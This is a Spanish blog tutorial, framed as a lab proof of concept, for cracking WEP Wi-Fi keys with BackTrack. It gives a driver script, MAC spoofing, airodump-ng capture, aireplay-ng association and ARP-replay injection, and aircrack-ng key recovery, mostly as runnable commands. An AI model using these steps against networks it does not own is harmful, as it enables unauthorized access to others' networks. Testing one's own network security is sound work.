Laboratorio: Prueba de concepto. Crackear claves WEP usando Backtrack

A continuación comparto una prueba de concepto para nuestras redes wifi de tipo WEP. En ningún caso aconsejo usar esto para una red Wifi que no sea de nuestra propiedad.

El CHIP de wireless es el INTEL PRO/Wireless 3945ABG Network

Nota: los comandos os los paso en forma de script para que podáis crear ejecutables con ellos, o sueltos y ejecutáis uno a uno

Comenzamos:
Tenemos que cambiar los drivers de la tarjeta ya que no soportan modo promiscuo. En el backtrack viene unos que nos interesan

Script: “ipw3945i.sh”

#!/bin/bash
echo “[*] Removing IPW3945 drivers”
rmmod ipwraw
rmmod iwl3945
rmmod mac80211
echo “[*] Inserting IPWRAW drivers (raw mode)”
modprobe ipwraw

Lanzamos :

iwconfig

Vemos cual es la tarjeta wifi, en mi caso es wifi0 continuo usandola como ejemplo.
Me cambio la MAC , este es un numero de cada “tarjeta del mundo”. Tambien podemos cambiarnos la MAC para imitar una que este conectada en la nuestra red.

ifconfig wifi0 down
macchanger –mac 00:10:20:30:40:50 wifi0
ifconfig wifi0 up
ifconfig wifi0

En este punto podemos usar “Backtrack->Wireless Tools -> Analyzers ->Kismet” para elegir la red a la que atacar, o usar los comandos:

airmon-ng start wifi0
airodump-ng wifi0

El software este se puede tambien ordenar como el kismet pero la verdad nunca lo he intentado,  aconsejo un vistazo al man para ver que tal ….
Una vez elegida la red a la que atacar haces un “CRTL+C” en esa ventana para que pare. Apuntas el bssid (MAC), el essid (NOMBRE) y channel (CANAL).

En otra ventana de shell que abriremos y dejaremos lanzado el comando, para monitorizar esa red elegida para atacarla:

airodump-ng -c $CHANNEL -w $ESSID –bssid $BSSID wifi0

Rellenando los datos de los que hemos recogido antes ($). Si el essid tiene espacios lo pones entre comillas.

En otra venta de shell comenzamos el ataque en si.

Nos asociamos al AP, con el comando rellenado ($) el dato recopilado antes:

aireplay-ng -1 0 -a $BSSID -h 00:10:20:30:40:50 wifi0

Aqui es normalmente cuando puede fallar el invento ya que no le guste nuestra fakeMAC (00:10:20:30:40:50) al AP. Tendremos que cambiarla en caso necesario.

Ahora comenzamos a meterle paquetes rellenado los datos necesarios ($):

aireplay-ng -3 -b $BSSID -h 00:10:20:30:40:50 wifi0

Cabe la posiblidad de que de golpe nos dia algo asi como “notice: got a deauth/disassoc packet. Is the source MAC associated ?" Eso es simplemente que tenemos que volver a lanzar la asociacion en otra shell, porque el router o AP se ha percatado de nuestro ataque y nos ha dado la patadita.

Y si todo es correcto solo nos queda esperar a que los ARP nos vayan subiendo. Es necesario unos 100.000 o 200.000 dependiendo si la pass es de 64bits o 128bits. Esta es la parte de paciencia, si no estuvieramos metiendole paquetes con el aireplay tendriamos que esperar conexiones en la red.

Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets…(499 pps)

Una vez tenemos eso ya veremos que en el sistema tendremos unos ficheros del nombre de la essid con extension “.cap” en el directorio en el que estábamos.
Pues realizamos rellenado los datos ($):

aircrack-ng -n 64 –bssid $BSSID $ESSID.cap

Para crackear una pass 64bit. El resultado nos viene como grupos de 2 separados por “:” quetamos los “:” y el chorizo se lo podemos poner directamente al windows.

aircrack-ng -n 128 –bssid $BSSID $ESSID.cap

Para cargarnos una de 128bit, y el resultado seria el mismo que anteriormente.

El backtrack esta disponible en  http://www.remote-exploit.org/

Espero que despues de esto puedas probar la seguridad de tu red y la importancia de usar protocolos más seguros.


Leave a Reply

Your email address will not be published. Required fields are marked *